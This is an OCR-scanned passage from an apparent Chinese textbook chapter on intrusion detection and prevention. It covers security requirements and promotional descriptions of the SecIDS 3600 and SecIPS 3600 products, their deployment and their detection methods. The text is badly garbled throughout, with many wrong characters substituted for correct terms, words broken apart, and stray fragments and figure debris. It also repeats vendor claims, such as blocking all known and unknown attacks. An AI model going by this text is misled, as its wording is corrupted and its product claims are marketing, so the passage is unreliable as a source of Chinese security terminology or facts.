战略 》, 首 次 将 网 络 空间 的 号 份 管理 上 升 到 国家 战略 的 局 度 ,并 着 手 构 建 网 络 号 份 生态 系 
统 。 这 一 战略 的 出 台 表明 美国 已 高 度 认识 到 网 络 喘 份 安 全 在 保障 网 络 空间 安全 中 的 重要 
成 略 地 位 。 从 各 国 的 战略 规划 的 内 容 看 ,一 方面 政府 厦 望 通过 顶层 安全 战略 的 制定 引导 
本 国安 全 产业 的 发 展 ; 必 一 方面 ,对 网 络 空间 的 保护 逐渐 上 升 到 和 传统 疆域 保卫 同等 的 地 
位 ,通过 成 立 网 络 安全 部 队 加 速 军队 信息 安全 攻防 的 研发 ,积极 应 对 未 来 有 可 能 发 生 的 网 
络 战争 。 

随 着 我 国 不 断 完善 网 络 安全 保障 措施 ,网 络 安全 防护 水 平 进 一 步 提 升 。 然 而 ,信息 技 
术 创 新 发 展 伴随 的 安全 威胁 与 传统 安全 问题 相互 交织 ,使 得 网 络 空间 安全 问题 日 益 复 杂 
隐蔽 ,面临 的 网 络 安全 风险 不 断 加 大 ,各 种 网 络 攻 击 事件 层 出 不 穷 , 如 图 4-1 所 示 ,根据 国 
家 计算 机 网 络 应 急 技 术 处 理 协 调 中 心 ( 简 称 CNCERT/CC) 报 告 ,网 络 安全 事件 依然 持续 
不 断 爆 发 。 国 家 互联 网 应 急 中 心 报告 ,2016 年 ,我 国 移动 互联 网 恶意 程序 数量 持续 高 速 
上 涨 且 具有 明显 趋 利 性 ;来 日 境外 的 和 针对 我 国境 内 的 网 站 攻击 事件 频 又 发生; 联网 和 留 能 设 
备 被 亚 意 控制 ,并 用 于 发 起 大 流量 分 布 式 拒绝 服务 攻击 的 现象 更 加 严重 ;网 站 数据 和 个 人 
信息 泄露 带 来 的 危害 不 断 扩大 ;欺诈 勒索 软件 在 互联 网 上 肆 层 ;具有 国家 痛 景 黑客 组 织 发 
动 的 APT 攻击 事件 二 接 威 胁 了 国家 安全 和 稳定 。 
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2 需求 分 析 
现在 许多 用 户 已 经 意识 到 这 一 点 ,使 用 了 许多 安全 设施 保护 内 部 网 络 使 其 免 遭 外 部 


攻击 。 实 际 上 ,由 心怀 不 满 的 历 员 或 合作 伙伴 发 起 的 内 部 攻击 占 网 络 入 侵 的 很 大 一 部 分 。 
据 统计 ,80% 的 计算 机 犯罪 来 源 于 内 部 威胁 。 
因此 需要 一 种 独立 于 钊 规 安全 机 制 的 安全 解决 方案 


能 够 破获 并 中 途 拦截 那些 能 
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够 攻破 网 络 第 一 近 防 线 的 攻击 。 这 种 解决 方案 就 是 ”入侵 检测 系统 ,利用 "入侵 检测 系 
统 "连续 监视 网 络 通信 情况 ,寻找 已 知 的 攻击 模式 , 当 它 检测 到 一 个 未 授权 活动 时 ,软件 会 
以 预定 方式 目 动 进行 啊 应 ,报告 攻击 、 记 录 该 事件 或 是 断 开 未 授权 连接 。“ 入 侵 检测 系统 ” 
能 够 与 其 他 安全 机 制 协同 工作 ,提供 真正 有 效 的 安全 保 隐 。 


3 对 有 效 的 攻击 识别 和 响应 的 要 求 

要 将 网 络 安全 保护 得 滴水 不 源 是 不 太 可 能 的 ,即使 是 按照 预先 制定 的 安全 策略 保护 
网 络 ,也 是 一 项 非常 艰巨 的 任务 。 即 使 是 被 保护 的 很 好 的 网 络 , 也 需要 不 断 更 新 ,以 修补 
新 出 现 的 源 润 。 保 护 网 络 是 一 项 持久 的 任务 , 它 包括 保护 、 监 视 ,、 测 试 ,以 及 不 断 的 改进 。 
“入侵 检测 系统 ”必须 满足 许多 要 求 ,以 提供 有 效 的 安全 保障 ,主要 有 以 下 要 求 。 

(1) 实时 操作 : 攻击 识别 和 啊 应 软件 必须 能 够 实时 检测 .报告 可 疑 攻 击 ,并 做 出 实时 
有 反应。 那些 仅 能 在 事后 记录 事件 .提供 校 验 登记 的 软件 效率 是 不 局 的 。 这 种 事后 检查 的 
软件 束 像 是 在 盗 央 们 扬长 而 去 之 后 才 报 冤 的 防盗 千代 。 此 外 ,许多 攻击 者 在 攻 入 时 怠 控 
摊 了 记录 ,所 以 仅 扫 摘 事件 记录 是 检查 不 到 攻击 的 。 

(2) 可 以 升级 : 正如 有 新 的 计算 机 病毒 不 断 涌现 一 梓 , 黑 客 们 总 能 找到 新 的 方法 侵 
入 计算 机 系统 ,所 以 攻击 识别 和 啊 应 软件 必须 能 够 将 已 徊 的 入 侵 模 式 和 未 授权 活动 不 断 
增加 到 知识 库 中 。 

(3) 可 运行 在 常用 的 网 络 操作 系统 上 : 软件 必须 支持 现 有 的 网 络 结构 。 也 就 是 说 ， 
它 必 须 文 持 现 有 的 网 络 操作 系统 ,如 Windows XP、Windows 7、Windows Server 2003/ 
2008/2012。 

(4) 多 于 配置 ; 在 无 需 币 牲 效率 的 条 件 下 ,多 于 配置 。 攻 击 识别 和 啊 应 软件 应 提供 
默认 配置 ,管理 员 可 以 迅速 安 效 并 随 肴 信息 的 积累 对 其 不 断 优 化 。 此 外 ,软件 还 应 提供 样 
本 配置 ,指导 管理 员 安 疹 系 统 。 

(5) 多 于 改变 安全 人蛇 略 : 现在 的 商业 环境 是 动态 的 ,公司 由 于 许多 因 系 而 不 断 变 
化 ,包括 重组 ,合并 和 大 并 。 有 所 以 ,安全 束 上 略 也 随 之 改变 ,为 了 保证 有 效 性 ,攻击 识别 和 
啊 应 软件 应 多 于 适应 改变 了 的 安全 策略 ,这 保证 了 安全 末 略 在 实际 运行 中 和 理论 上 一 
样 有 效 。 

(6) 不 易 察 觉 : 该 软件 应 该 以 不 多 逢 察 筑 的 方式 运行 。 也 束 是 说 , 它 不 会 降低 网 络 
性 能 。 它 对 被 授权 用 户 是 透明 的 ,所 以 它 不 会 影响 生产 诗 。 此 外 , 它 不 会 引起 人 侵 者 的 
注意 。 

412 解决 万 案 及 分 析 

1 解决 方案 

网 神 SecIDS 3600 通过 高 效 的 模式 匹配 、. 异 第 检测 .协议 分 析 等 技术 手段 ,对 用 户 网 
络 链 路 的 实时 监控 ,期间 发 现 大 量 的 DoS/DDoS、Web 攻击 等 异常 行为 攻击 特征 ,设备 能 
及 时 问 管 理 员 发 出 警告 信息 ,根据 用 户 实际 环境 监测 统计 分 析 ,为 管理 员 提 供 及 时 准确 的 
网 络 行为 分 析 数 据 , 有 助 于 针对 性 地 对 网 络 采 取 一 些 规避 补救 措施 ,保障 了 用 户 网 络 的 安 
全 及 可 菲 性 。 
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网 神 SecIDS 3600 可 以 通过 单机 部 署 的 方式 部 署 在 服务 器 上 。 单 机 部 署 方式 即 把 管 
理 控制 台 安装 在 一 台 功 能 较 强大 的 计算 机 上 。 虽 然 集中 式 部 署 的 计算 能 力 可 能 不 如 分 布 
式 部 署 ,但 这 种 部 署 方式 有 利于 管理 ,对 于 一 般 的 中 小 企业 很 适用 。 这 种 模式 适合 于 负载 
不 是 很 重 ,设备 较 少 的 网 络 环境 ， 

单机 部 署 网 络 如 图 4-2 所 示 , 其 显示 的 是 最 具 代 表 性 的 单机 部 署 网 络 拓扑 结构 。 经 
过 安全 需求 分 析 , 用 户 一 般 比较 关注 的 是 服务 器 区 和 Internet 出 口 这 两 个 部 分 。 那 么 ,在 
这 两 个 部 分 部 署 一 套 独 立 的 人 侵 检测 系统 就 能 够 满足 安全 需求 。 用 户 如 果 需 要 增加 监控 
区 域 ,只 选择 多 端口 的 高 端 入 侵 检测 设备 即 可 满足 需求 。 


研发 网 段 


研发 服务 器 
公共 服务 网 段 


数据 库 DNS 
服务 器 服务 前 


4-2 单机 部 署 网 络 


2 产品 功能 及 特点 

SecIDS 3600 入 侵 检测 系统 是 基于 网 络 安全 技术 和 释 客 撤 术 多 年 全 完 的 基础 上 开发 
的 网 络 信 侵 检测 系统 。SecIDS 3600 入 侵 检测 系统 是 一 项 创新 性 的 网 络 威胁 和 流量 分 析 
系统 , 它 综合 了 网 络 监 挖 和 入 侵 检 测 功 能 ,能 够 实时 监控 网 络 传 辆 ,通过 对 融 速 网 络 上 的 


数据 包 捕 获 ,进行 深入 的 协议 分 析 , 结 合 特征 库 进行 相应 的 模式 匹配 ,通过 对 以 往 的 行为 
和 事件 的 统计 分 析 , 目 动 发 现 来 日 网 络 外 部 或 内 部 的 攻击 ,并 可 以 实时 啊 应 ,切断 攻击 方 
的 连接 ,帮助 企业 最 大 限度 地 保护 公司 内 部 的 网 络 安全 。 

1) 产品 功能 

(1) 部 署 和 管理 功能 。 

提供 中 文化 的 管理 界面 ;提供 检测 策略 模板 ,并 可 针对 不 同 的 网 络 环境 派生 新 的 策 
格 ,方便 用 户 根 据 实际 情况 制定 适合 企业 目 映 环境 的 安全 策略 ; 文 持 安全 事件 数据 库容 量 
预警 及 异常 处 理 功能 ,以 防止 因 存 储 空间 的 不 足 导 人 致 的 数据 丢失 。 

(2) 检测 与 报警 能 力 。 

提供 对 多 种 应 用 的 检测 能 力 ,包括 间 谍 木 马 、 恶 意 软件 ,蠕虫 病毒 及 DDoS 等 的 多 种 
攻击 威胁 检测 ;提供 在 线 和 本 地 的 升级 方式 ,平均 升级 周期 不 大 于 1 周 ;产品 提供 多 种 抗 
逃避 技术 : 具备 IP 碎片 重组 与 TCP 流 重组 功能 .具备 抗 HTTP 变形 逃避 功能 等 :报警 信 
息 提 供 关 于 攻击 的 详细 内 容 : 如 IP 地 址 .端口 .时 间 和 类 型 等 常规 信息 ;支持 邮件 .Syslog 
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等 多 种 高 级 报警 方式 ;提供 对 IEEE 802. 1q 封装 数据 包 的 解析 及 检测 能 力 。 

(3) 报表 与 日 志 审计 。 

入 侵 检测 系统 相关 日 志 的 导出 ;支持 统计 和 查询 报告 的 导出 。 

(4) 日 号 安全 指标 。 

支持 设备 的 囊 外 管理 ,监听 端口 支持 隐秘 模式 ,无 需 IP 地 址 和 网 络 配 置 ;支持 Con- 
sole 配置 界面 管理 ; 文 持 用 户 分 角色 管理 。 

2) 产品 特点 

(1) 配置 简单 ,使 用 方便 ，。 

SecIDS 3600 入侵 检测 系统 的 平台 经 过 专门 优化 及 加 固 ,使 用 更 加 安全 方便。 用 户 
经 过 简单 配置 , 接 电 即 可 使 用 。 

(2) 检测 基于 网 络 的 攻击 。 

SecIDS 3600 网 络 传 感 硕 检 查 所 有 包 的 头 部 ,从 而 发 现 恶意 的 和 可 疑 的 行动 迹象 。 
例如 ,许多 来 日 IP 地 址 的 拒绝 服务 型 (DOS) 和 雁 片 包 型 (Teardrop) 的 攻击 只 能 在 它们 经 
过 网 络 时 检查 包 的 头 部 才能 发 现 。 这 种 类 型 的 攻击 都 可 以 在 SecIDS 3600 中 通过 实时 监 
测 网 络 数据 包 流 而 被 发 现 。 

SecIDS 3600 网 络 传 感 带 可 检查 有 效 鱼 载 的 内 容 , 查 找 用 于 特定 攻击 的 指令 或 请 法 。 
例如 ,通过 检查 数据 包 有 效 负 载 可 以 查 到 黑客 软件 ,而 正在 寻找 系统 漏洞 的 攻击 者 宫 无 

(3) 实时 检测 和 啊 应 。 

SecIDS 3600 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 出 来 ,并 做 出 快速 的 通 
知 和 啊 应 。 实 时 通知 时 可 根据 预定 义 的 参数 做 出 快速 反应 ,这 些 反 应 包括 收集 信息 、 计 入 
数据 库 ,将 告警 事件 发 往 安全 运行 中 心 等 。 

(4) 对 网 络 几乎 没有 影响 。 

SecIDS 3600 完全 不 会 造成 网 络 的 时 延 。SecIDS 3600 网 络 传感器 仅 对 网 络 数据 流 
进行 监控 ,复制 需要 的 包 , 完 全 不 会 对 包 的 传输 造成 延迟 。 唯 一 可 能 造成 延迟 的 情况 是 网 
络 传 感 硕 发 出 中 断 连 接 的 数据 包 ,当然 受 到 影响 的 只 有 攻击 者 。 

SecIDS 3600 增加 的 网 络 流量 也 微不足道 。 增 加 的 网 络 流 量 取 决 于 分 布 式 配置 的 情 
况 , 主 要因 系 取 决 于 网 络 传 感 带 回 探 制 台 传输 数据 的 数量 和 频 崇 程度 。 

(5) 攻击 者 不 易 转 移 证 据 。 

SecIDS 3600 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 检测 ,所 以 攻击 者 无 法 转移 
证 据 。 被 捕捉 的 数据 不 仅 包 括 攻击 的 方法 ,而 且 还 包括 攻击 的 源 地 址 和 目的 地 址 。 许 多 
黑客 都 熟知 审计 记录 ,他 们 知道 如 何 操纵 这 些 文件 掩盖 他 们 的 作案 痕迹 ,但 他 们 很 难 抹 去 
被 人 侵 检 测 系统 实 时 记录 下 来 的 数据 。 

3) 产品 优势 

(1) 强大 的 分 析 检 测 能 

采用 了 先进 的 入侵 检测 技术 体系 ,基于 状态 的 应 用 层 协议 分 析 技 术 ,使 系统 能 够 准 
确 、 快 速 地 检测 各 种 攻击 行为 ,并 显 闭 地 提高 系统 的 性 能 ,能 够 适应 日 益 复 淋 的 网 络 
环境 。 
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(2) 基于 状态 的 协议 分 析 。 

基于 已 知 协议 和 RFC 规范 的 深入 理解 ,SecIDS 3600 入 侵 检 测 系 统 具 有 强大 的 检测 
协议 异 第 ,协议 误 用 的 能 力 ,解决 了 以 往 基于 单纯 模式 匹配 技术 的 IDS 产品 片面 依赖 攻 
击 特 征 签名 数量 检测 攻击 的 棘 端 ,提高 了 检测 准确 性 和 效率 。SecIDS 3600 入 侵 检测 系 
统 目前 支持 Telnet .FTP、HTTP、SMTP、DNS 等 数 十 种 主流 应 用 层 协议 。 

(3) 超 低 的 误 报 率 和 举报 率 。 

采用 TCP/IP 数据 重组 技术 .应 用 程序 识别 技术 、 完 整 的 应 用 层 状 态 追 蹊 技术 .应 用 
层 协议 分 析 技 术 及 多 项 反 IDS 逃避 技术 , 文 持 在 复杂 的 网 络 环境 中 部 署 ,提供 业界 超 低 
的 误 报 率 和 漏 报 率 。 

(4) 丰 昌 的 事件 啊 应 方式 。 

针对 不 同类 型 数据 包 流 量 传递 的 过 程 ,入侵 检测 系统 可 在 发 现 攻击 的 当下 通过 已 定 
义 好 的 检测 行为 动作 加 以 检测 ,系统 提供 事件 记录 .通过 邮件 敬告.Syslog 报警 等 。 

(5) 更 下 观 的 策略 管理 结构 。 

SecIDS 3600 入 侵 检 测 系统 采用 全 新 的 条 略 管理 续 构 ,结合 新 的 策略 分 类 、 策 略 浅 
发 .策略 啊 应 管理 等 功能 ,用 户 可 以 方便 快捷 地 建立 适用 不 同 环境 的 攻击 检测 策略 。 

(6) 灵活 的 签名 分 类 。 

基于 网 络 应 用 .风险 级 别 和 攻击 类 型 等 分 类 原则 ,用 户 可 以 更 准确 .快捷 地 查找 到 所 
关注 的 签名 类 别 。 
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421 应 用 育 票 及 需求 分 析 

1 应 用 背景 

通过 对 大 量 用 户 网 络 的 安全 现状 和 已 有 的 安全 控制 捞 施 进行 深入 分 析 可 知 , 很 多 用 
户 网 络 中 仍然 存在 者 大 量 的 安全 隐患 和 风险 ,这 些 风 险 对 用 户 网 络 的 正 第 运行 和 业务 的 
正常 开展 构成 严重 威胁 ,主要 表现 在 以 下 3 方面 。 

1) 操作 系统 和 应 用 软件 源 洞 隐患 

用 尸 网 络 多 由 数量 庞大 种 类 权 多 的 软件 系统 组 成 ,有 系统 软件 数据 库 系 统 、 应 用 软 
件 等 ,尤其 是 存在 于 广大 终端 用 户 办 公 果 面 上 的 各 种 应 用 软件 不 胜 老 洒 ,每 个 软件 系统 都 
有 不 可 避免 的 洪 在 的 或 已 知 的 软件 潮 洞 ,每 天 软件 开发 者 都 在 生产 漏洞 ,每 时 每 刻 都 可 能 
有 软件 汤 洞 被 发 现 \、 利 用 。 无 论 哪 一 部 分 的 漏洞 被 利用 ,部 会 给 企业 市 来 危害 , 轻 者 危及 
个 别 设备 , 重 者 湄 洞 成 为 攻击 整个 用 户 网 络 的 跳板 ,人 危及 整个 用 户 网 络 安全 ,即使 安全 防 
护 已 经 很 完备 的 用 户 网 络 ,也 会 因 一 个 联网 用 户 个 人 终端 PC 存在 漏洞 而 丧失 其 整体 安 
全 防护 能 

2) 各 种 DoS 和 DDoS 攻击 市 来 的 威胁 

除了 由 于 操作 系统 和 网 络 协议 存在 漏洞 和 奥 陷 可 能 遭 党 攻击 外 ,现在 IT 部门 还 面 

119 


入 侵 检 测 与 入 侵 防 得 


临 着 DoS 攻击 和 DDoS 攻击 的 挑战 。 

DoS 和 DDoS 攻击 会 耗 尽 用 户 宝 贯 的 网 络 和 系统 资源 ,使 依赖 计算 机 网 络 的 正常， 
ee eps $$ 并 造成 极 大 的 经 济 损失 ，。 

与 工作 无 关 的 网 络 行为 

本 查 机 构 IDC 的 统计 表明 : 30% 一 40 皮 工作 时 间 内 发 生 的 企业 员工 网 络 访问 行 
为 与 本 职工 作 无 关 , 如 游戏 ,聊天 、 视 频 、P2P 下 载 等 。 另 一 项 调查 表明 : 1/3 的 员工 曾 在 
上 班 时 间 玩 计算 机 游戏 。 

Emule、BT 等 P2P 应 用 和 MSN QQ 等 即时 通信 软件 在 很 多 网 络 中 被 不 加 控制 地 使 
用 ,使 大 量 宝贵 的 带宽 资源 被 业务 无 关 流 量 消耗 。 这 些 行 为 无 疑 会 浪费 网 络 资源 .降低 劳 
动 生产 率 .增加 企业 运营 成 本 支出 ,并 有 可 能 因为 不 良 的 网 络 访问 行为 导致 企业 信息 系统 
被 人 侵 和 机 蜜 资料 被 禄 ,引起 法 律 责任 和 诉讼 风险 。 


2 需求 分 析 

根据 上 面 的 安全 威胁 分 析 , 需 要 采取 相应 措施 消除 这 些 安全 隐患 。 因 此 ,安全 需求 可 
以 归纳 为 以 下 3 方面 。 

(1) 加 强 网 络 边界 的 安全 防护 手段 ,准确 检测 人 侵 行为 ,并 能 够 实时 阻 断 攻击 。 

(2) 防御 来 自 外 部 的 攻击 和 病毒 传播 。 

(3) 加 强 网 络 市 宽 管 控 及 上 网 行为 管理 。 


422 解决 方案 及 分 析 


1 解决 方案 

网 神 SecIPS 3600 入 侵 防 御 系 统 基于 先进 的 体系 架构 和 深度 协议 分 析 技 术 , 结 合 
议 异 常 检 测 .状态 检测 .关联 分 析 等 手段 ,针对 蠕虫 .间谍 软件 .垃圾 邮件 .DDoS/DoS 攻 
击 、 网 络 人 资源 选用 等 亿 害 网 络 安全 的 行为 ,采取 主动 防 咎 措施 ,实时 阻 断 网 络 流量 中 的 亚 
意 攻击 ,确保 信息 网 络 的 运行 安全 。 

1) 针对 应 用 程序 防护 

SecIPS 3600 人 侵 防 御 系 统 提 供 扩 展 至 用 户 痪 .服务 硕 及 第 2 一 7 层 的 网 络 型 攻击 防 
护 ,如 防御 蠕虫 与 木马 程序 。 利 用 深层 检测 应 用 层 数据 包 的 技术 ,SecIPS 3600 入 侵 防 箱 
系统 可 以 分 辨 出 合法 与 有 害 的 封包 内 容 。 最 新 型 的 攻击 可 以 透 过 伪 朔 成 合法 应 用 的 技 
术 , 轻 匈 容 透 防火 墙 。SeclIPS 3600 人 侵 防 御 系 统 运用 重组 TCP 流量 以 检视 应 用 层 数据 
包 内 容 的 方式 ,辨识 合法 与 恶意 的 数据 流 。 大 部 分 的 和 人 侵 防御 系统 都 是 针对 已 知 的 攻击 
进行 防御 ,然而 SecIPS 3600 人 侵 防 御 系 统 运 用 漏洞 基础 的 过 滤 机 制 , 可 以 防范 所 有 已 知 
与 未 知 形式 的 攻击 。 

2) 针对 网 络 架 构 防 护 

路 由 带 .交换 硕 、.DNS 服务 融 以 及 防火 墙 部 是 有 可 能 被 攻击 的 网 络 设 备 , 如 果 这 些 网 
络 设备 被 攻击 寻 致 停机 ,那么 所 有 企业 中 的 关键 应 用 程序 也 会 随 之 停 押 。 网 神 SecIPS 
3600 人 侵 防 御 系 统 的 网 络 避 构 防护 机 制 提 供 了 一 系列 网 络 漏洞 过 滤 此 ,以 保护 网 络 设备 
免 于 遭 党 攻击 。 
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3) 针对 性 能 保护 

针对 性 能 保护 用 于 保护 网 络 带宽 及 主机 性 能 , 免 于 被 非法 应 用 程序 占用 正常 的 网 络 
性 能 。 如 有 果 网 络 链 路 拥塞 ,那么 重要 的 应 用 程序 数据 将 无 法 在 网 络 上 传输 。 非 商用 的 应 
用 程序 ,如 点 对 点 文档 共 至 应 用 或 实时 通信 和 软件 将 会 快速 耗 尽 网 络 的 涡 宽 ,通过 对 具体 应 
用 的 有 效 控 制 ,能 够 从 根本 上 缓解 因 上 述 问 题 的 涌现 给 网 络 链 路 带 来 的 压力 。 

2 方案 部 署 方式 

1) 部 署 拓 扑 

网 神 SecIPS 3600 部 署 方式 如 图 4-3 所 示 , 显示 的 是 最 具 代 表 性 的 部 署 网 络 拓 扑 结 
构 。 经 过 安全 需求 分 析 ,用 户 一 般 比 较 关 注 的 是 内 网 边界 数据 中 心 .服务 副 区 ,可 以 在 这 
些 区 域 部 署 独立 的 人 侵 防 御 系 统 。 用 户 如 果 需 要 增加 监控 区 域 , 只 选择 多 端口 的 高 端 人 
侵 检 测 设备 即 可 满足 需求 。 


yd 


a 


2 a 网 六 IPS 


交换 机 ~ 
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Server Server Server 


4-3 网 神 SecIPS 3600 部 署 方式 


2) 系统 优化 调整 

为 了 让 IPS 能 准确 无 误 地 保护 网 络 ,部 署 IPS 设备 应 该 按照 以 下 两 个 阶段 进行 。 

(1) 第 一 阶段 ,IPS 以 监测 模式 工作 ,只 检测 攻击 并 告警 ,不 进行 阻 断 。 

首先 将 IPS 的 工作 模式 设置 为 IPS 监视 模式 ,在 该 模式 下 ,IPS 的 检测 引擎 根据 安全 
策略 对 网 络 中 通过 的 数据 进行 检测 ,如 果 用 户 设 置 了 对 攻击 数据 包 的 阻 断 功 能 ,IPS 会 产 
生 相 应 的 阻 断 报警 ,但 是 不 会 采取 任何 阻 断 或 流量 控制 操作 。 这 种 模式 主要 用 于 首次 部 
署 时 对 用 户 网 络 环境 的 学 习 与 策略 优化 阶段 ,根据 检测 到 的 网 络 中 可 能 出 现 的 攻击 行为 ， 
对 攻击 签名 特征 库 和 净值 等 参数 做 出 调整 ,减少 IPS 产生 误 报 的 可 能 性 。 
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为 外 ,在 此 模式 下 ,用 户 可 以 观察 IPS 设备 的 加 入 会 不 会 对 原 有 的 网 络 应 用 产生 影 
啊 , 以 确保 IPS 的 性 能 能 够 满足 原 有 网 络 应 用 的 需求 。 

(2) 第 二 阶段 ,IPS 以 Inline 模式 工作 ,全面 检 测 ,全 面 防 护 。 

经 过 第 一 阶段 的 学 习 、 调 整 和 适应 后 ,已 经 可 以 确认 IPS 能 够 以 监视 方式 正常 运行 ， 
并 且 不 会 阻 断 正常 合法 的 网 络 数据 包 , 这 时 束 可 以 开局 IPS 的 防御 功能 ,进入 阻 断 攻击 、 
全 面 防御 的 阶段 。 


3 产品 优势 

1) 新 一 代 的 检测 分 析 技 术 

SecIPS 3600 检测 引擎 结合 了 异常 检测 与 攻击 特征 数据 库 检 测 的 拉 术 ,和 它 同 时 也 包含 
了 诛 层 数据 包 检 查 能 力 , 除 了 检查 第 4 层 数 据 包 外 ,更 能 诛 和 人 检查 到 第 7 层 的 数据 包 内 
容 , 以 阻挡 恶意 攻击 的 千 透 ,同时 不 影 啊 正 利和 程 序 的 工作 。 

SecIPS 3600 的 检测 引擎 提供 多 种 检测 模式 保证 准确 度 , 并 且 在 不 影 啊 网 络 性 能 的 状 
况 下 ,提供 客户 最 佳 的 保护 。 在 SecIPS 3600 上 使 用 的 检测 方法 包括 : 

(1) 状态 模式 检测 (Stateful Detection ) 。 

许多 攻击 是 试图 推翻 通信 协议 状态 。 基 于 多 年 TCP/TP 的 研究 ,SecIPS 3600 开发 了 
一 个 状态 检查 引擎 分 析 协 议 状 态 ,并 且 防 止 malformed 数据 包 攻 击 网 络 。 

(2) 攻击 特征 数据 库 模 式 检 测 (Signature-Based Detection ) 。 

SecIPS 3600 检测 针对 应 用 协议 和 脆弱 系统 的 攻击 ,具有 超过 2600 条 的 攻击 特征 数 
据 库 , 这 些 攻击 特征 数据 库 由 深 具 网 络 安全 经 验 的 安全 服务 团队 开发 制定 。 

(3) 缓冲 区 汶 出 检测 (Buffer-Overflow Detection)。 

缓冲 区 溢出 是 一 种 黑客 经 第 利用 的 技术 ,如 冲击 波 攻击 就 是 利用 微软 的 RPC DCOM 
漏洞 感染 网 络 上 数 百 万 的 主机 。SecIPS 3600 可 以 通过 内 置 特征 库 阻挡 缓冲 区 溢出 攻击 ， 
阻止 墨客 取得 非法 授权 进入 网 络 。 

(4) 木马 /后 门 检测 (Trojan/ Backdoor Detection ) 。 

黑客 使 用 木马 和 后 门 程序 取得 非法 授权 进入 个 人 计算 机 或 服务 融 。 基 于 现 有 的 木马 
和 后 门 程序 的 技术 ,SecIPS 3600 可 以 通过 内 置 特征 库 检 测 并 防止 木马 和 后 门 程序 。 

(5) 拒绝 服务 /分 布 式 拒绝 服务 检测 (Dos/DDos Detection) 。 

黑客 可 以 在 不 需要 任何 授权 的 情况 下 发 送 大 量 数 据 包 进入 网 络 , 这 些 流量 可 以 是 单 
一 数据 包 或 是 日 动 发 送 分 布 式 拒绝 服务 攻击 的 工具 所 产生 的 攻击 信号 ,一 些 蠕 虫 也 可 以 
发 送 大 量 扫 描 信 号 进入 网 络 ,SecIPS 3600 利用 拒绝 服务 /分 布 式 拒绝 服务 检测 机 制 防止 
此 类 型 的 所 有 攻击 。 

(6) 访问 控制 检测 (Access Control Detection ) 。 

一 些 会 造成 敏感 信息 泄露 的 网 络 行 为 是 非常 危险 的 ,SecIPS 3600 利用 攻击 特征 数据 
库 防止 这 些 行 为 发 生 。SecIPS 3600 也 提供 最 大 的 灵活 性 ,让 客户 可 以 定制 专属 的 策略 。 
此 项 功能 可 让 客户 日 行 制定 网 络 第 3 一 7 层 的 防御 生 略 。 

(7) Web 攻击 检测 (Web Attack Detection)。 

Web 服务 虽然 在 全 世界 被 广泛 使 用 ,但 是 却 被 发 现 有 很 多 蚤 点 ,利用 这 些 弱 点 是 相 
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当 容 匈 的 ,信息 可 以 通过 因特网 日 由 分 至 ,为 了 防止 黑客 利用 Web 服务 的 罚 点 ,SecIPS 
3600 可 以 针对 Web 服务 器 的 弱点 进行 保护 。 

(8) 昼 点 扫描 /探测 检测 (Vulnerability Scan/ Probe Detection ) 。 

为 了 得 到 信息 和 系统 的 漏洞 ,黑客 会 在 网 络 上 发 送 检 查 数据 包 来 扫描 系统 ,SecIPS 
3600 可 以 检测 出 这 些 弦 点 扫描 /探测 的 数据 包 , 并 提供 最 好 的 保护 。 

(9) 基于 邮件 的 攻击 检测 (Mail-based Attack Detection)。 

基于 邮件 的 攻击 现在 非常 普遍 ,如 W32/Mydoom 引起 全 世界 几 十 亿 的 金融 损失 ， 
SecIPS 3600 提供 SMTP 过 沽 功能 及 病毒 数据 库 , 以 防止 病毒 侵 人 邮件 服务 需 。 

(10) 蠕虫 检测 (Worm Detection ) 。 

网 络 蠕虫 能 够 迅速 蛇 殖 ,并 引起 全 世界 网 络 的 异常 ,其 至 瘫痪 。SecIPS 3600 能 够 阻 
挡 蠕 虫 的 攻击 ,保障 网 络 的 安全 与 干净 。 

(11) 协议 异常 检测 (Protocol Anomaly Detection) 与 流量 异常 检测 (Traffic Anomaly 
Detection ) 。 

安全 团队 人 研究 与 分 析 因 特 网 的 协议 和 标准 ,一 般 的 因特网 服务 带 邦 如 人 循 这 些 标准 提 
供 稳定 的 服务 ,黑客 经 常 利 用 破坏 这 些 标准 协议 的 方式 入 侵 系 统 ,SecIPS 3600 检测 并 清 
除 这 些 异 第 数据 包 , 保 障 服务 带 免 蛋 这 些 未 知 数 据 包 的 攻击 。 

当 网 络 被 攻击 时 ,网 络 流 量 异 常 增加 是 很 正常 的 。 依 据 多 年 网 络 攻击 事件 处 理 的 经 
验 , 安 全 团队 建立 了 最 佳 的 规则 ,并 将 此 统计 分 析 方 法 整合 进 SecIPS 3600 ,提供 最 佳 的 检 
测 与 防御 。 

2) 优异 的 产品 性 能 

SecIPS3600 入 侵 防 御 系 统 专门 设计 了 安全 ,可 徘 , 高 效 的 人 硬件 运行 平台 。 便 件 平台 
采用 严格 的 设计 和 工艺 标准 ,保证 了 高 可 靠 性 ;独特 的 硬件 体系 结构 大 大 提升 了 处 理 能 
力 ` 厨 吐 量 ; 操 作 系 统 经 过 优化 和 安全 性 处 理 , 保 证 系统 的 安全 性 和 抗 毁 性 。 

SecIPS3600 入 侵 防 御 系 统 依赖 先进 的 体系 架构 .高 性 能 专用 人 硬件 ,在 实际 网 络 环境 
部 得 中 性 能 表现 优 腊 ,具有 线 速 的 分 析 与 处 理 能 力 。 

SecIPS 3600 入 侵 防 御 系 统 文 持 应 用 保护 .网 络 架 构 保 护 和 性 能 保护 ,彻底 防护 各 种 
网 络 攻击 行为 : 间 旋 软件 /木马 .里 虫 .Dos 和 DDoS 以 及 各 种 人 侵 行 为 。 

3) 局 可 用 性 

SecIPS 3600 入 侵 防 御 系 统 支持 失效 开放 (Fail Bypass) 机 制 , 当 出 现 软件 故障 、 便 件 
上 故障、 电源 故障 时 ,系统 Bypass 电 口 自动 切换 到 直通 状态 ,以 保障 网 络 可 用 性 ,避免 单 点 
故障 ,不 会 成 为 业务 的 阻 断 点 。 

SecIPS 3600 入 侵 防 御 系 统 的 工作 模式 灵活 多 样 ,支持 Inline 主动 防御 . 劳 路 检测 方 
式 ,能 够 快速 部 署 在 各 种 网 络 环 境 中 ， 

4) 对 攻击 事件 的 取证 能 力 

网 络 人 侵 防 御 系 统 除 需要 能 检测 辨别 出 各 种 网 络 人 侵 攻 击 , 保 护 网 络 及 服务 带 主 机 
的 安全 外 ,还 需要 提供 完整 的 取证 信息 ,提供 客户 追查 墨客 攻击 的 来 源 , 这 些 信 息 需 包括 
入 侵 攻 击 的 数据 包 种 类 来源 IP 地 址 .攻击 的 时 间 等 信息 。 

